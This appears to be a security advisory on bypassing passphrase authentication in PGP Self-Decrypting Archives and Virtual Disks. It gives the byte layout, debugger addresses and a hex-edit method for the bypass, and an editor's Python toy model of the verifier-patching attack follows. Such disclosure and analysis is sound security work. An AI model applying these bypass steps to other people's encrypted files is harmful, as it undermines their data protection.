* PGP Virtual Disk backdooring (Working 100%).


* PGP Virtual Disk mounting / adding users / deleting users / re-encrypting
disk (Working 100%).


* PGP Virtual Disk mounting and data access (Working 40%. Need more time to
debug).


* PGP SDA passphrase bypass. (Working 100%)


* PGP SDA extraction is possible IF the input file is the same (Working
100%, patching using a debugger)


* PGP SDA extraction is possible for any file (Working 80%. Need more time
to debug)


* OTHER AFFECTED PRODUCTS:

  o iOPUS Secure Email Attachments (SEA) V1.0

  o TrueCrypt free open-source disk encryption software 4.2


* WinZip was not affected. 1- In WinZip you do not know where the
password location is. 2- If you change one bit your file won't work.


* I DO NOT HAVE more time to test, but I am sure many smart dudes out there
would love to play some more.


* To do: Build an application to mount PGP Virtual Disks using this bug.


* To do: Build an application to extract PGP SDA files using this bug.


After spending 6 days on this I have decided to stop. But I will be doing more
testing when I have some free time. You are free to do your own tests. If you
wish to share your own tests or findings with me please feel free to contact me
at [EMAIL PROTECTED]



 

PGP SDA authentication method

=============================

Let's say you created a text file and wrote inside it "aa", then created an SDA.

If you hex edit the output exe, you will notice at the very bottom of the file
some bytes separated by 803E.

Ex:


E7 93 A0 90 E9 62 D1 21

803E

A1 50 AF 5F 6F 9E FE D6


Analysing the bytes carefully, you will notice that 803E is the value used for
a loop. The loop starts at 0040590D. Further analysis showed that the bytes
right before 803E are used for extraction and authentication. Authentication
is done in the following way:


When someone enters a passphrase a series of instructions is executed against
the bytes right before 803E, to be exact in the function at address 00404E8F.
This function generates a series of bytes which are compared later on to the
bytes AFTER 803E. If they match you are granted auth.


The auth. byte comparison is done in the following instruction:

00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI
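
A toy model of the SDA check the advisory above describes, added here as an
editor's example rather than PGP's code: eight bytes before 803E go into a
derivation routine, the eight bytes after it hold the expected result, and the
REPE CMPS with ECX=2 compares those two dwords. The model assumes, as the
advisory's own note that non-empty archives still need a debugger suggests,
that the data key is derived from the passphrase alongside the verifier;
PBKDF2, the 8-byte salt and the SHA-256 counter keystream are placeholders for
whatever PGP really uses. patch_verifier() is the hex-editor step: it rewrites
the bytes after 803E for a passphrase the attacker knows. That gets through the
passphrase dialog and locks out the original passphrase (the availability point
the authors make), but under this design the decrypted output is garbage
unless the real data key is recovered some other way.

```python
import hashlib
import hmac
import os

SEP = b"\x80\x3e"          # the 803E separator the advisory reports
SALT_LEN = 8               # the eight bytes shown before 803E (assumed to be a salt)
VERIFIER_LEN = 8           # the eight bytes after it: two dwords, ECX=2 in REPE CMPS
TRAILER_LEN = SALT_LEN + len(SEP) + VERIFIER_LEN


def derive(passphrase, salt):
    """Stand-in for the routine at 00404E8F: passphrase + pre-803E bytes ->
    (verifier, data_key). PBKDF2-HMAC-SHA256 is this model's choice, not PGP's."""
    out = hashlib.pbkdf2_hmac("sha256", passphrase, salt, 10000, dklen=VERIFIER_LEN + 32)
    return out[:VERIFIER_LEN], out[VERIFIER_LEN:]


def keystream(key, n):
    """Toy counter-mode keystream from SHA-256 (placeholder for the real cipher)."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def build_sda(payload, passphrase, salt=None):
    """ciphertext || salt || 803E || verifier  (model of the file tail)."""
    salt = salt if salt is not None else os.urandom(SALT_LEN)
    verifier, key = derive(passphrase, salt)
    return xor(payload, keystream(key, len(payload))) + salt + SEP + verifier


def split_sda(blob):
    body, trailer = blob[:-TRAILER_LEN], blob[-TRAILER_LEN:]
    salt = trailer[:SALT_LEN]
    sep = trailer[SALT_LEN:SALT_LEN + len(SEP)]
    verifier = trailer[SALT_LEN + len(SEP):]
    if sep != SEP:
        raise ValueError("803E separator not found")
    return body, salt, verifier


def authenticate(blob, passphrase):
    """The gate: the comparison at 00409797, stored verifier vs. derived bytes."""
    _, salt, verifier = split_sda(blob)
    return hmac.compare_digest(verifier, derive(passphrase, salt)[0])


def extract(blob, passphrase):
    """Pass the gate, then decrypt with the key derived from the typed passphrase."""
    if not authenticate(blob, passphrase):
        return None
    body, salt, _ = split_sda(blob)
    _, key = derive(passphrase, salt)
    return xor(body, keystream(key, len(body)))


def patch_verifier(blob, known_passphrase):
    """The hex-editor attack: keep the bytes before 803E, replace the bytes
    after it with the verifier for a passphrase the attacker knows."""
    body, salt, _ = split_sda(blob)
    return body + salt + SEP + derive(known_passphrase, salt)[0]


if __name__ == "__main__":
    # constructed inputs, after the advisory's own small test file
    sda = build_sda(b"aa", b"owner passphrase")
    patched = patch_verifier(sda, b"a")
    print("gate with 'a' after patch    :", authenticate(patched, b"a"))
    print("gate with owner's passphrase :", authenticate(patched, b"owner passphrase"))
    print("what 'a' actually extracts   :", extract(patched, b"a"))
```

Whether a product behaves like this model or like the stego tools above (where
the password gates data that is not bound to it) is the question the two sides
of this thread are arguing; the model makes the difference concrete.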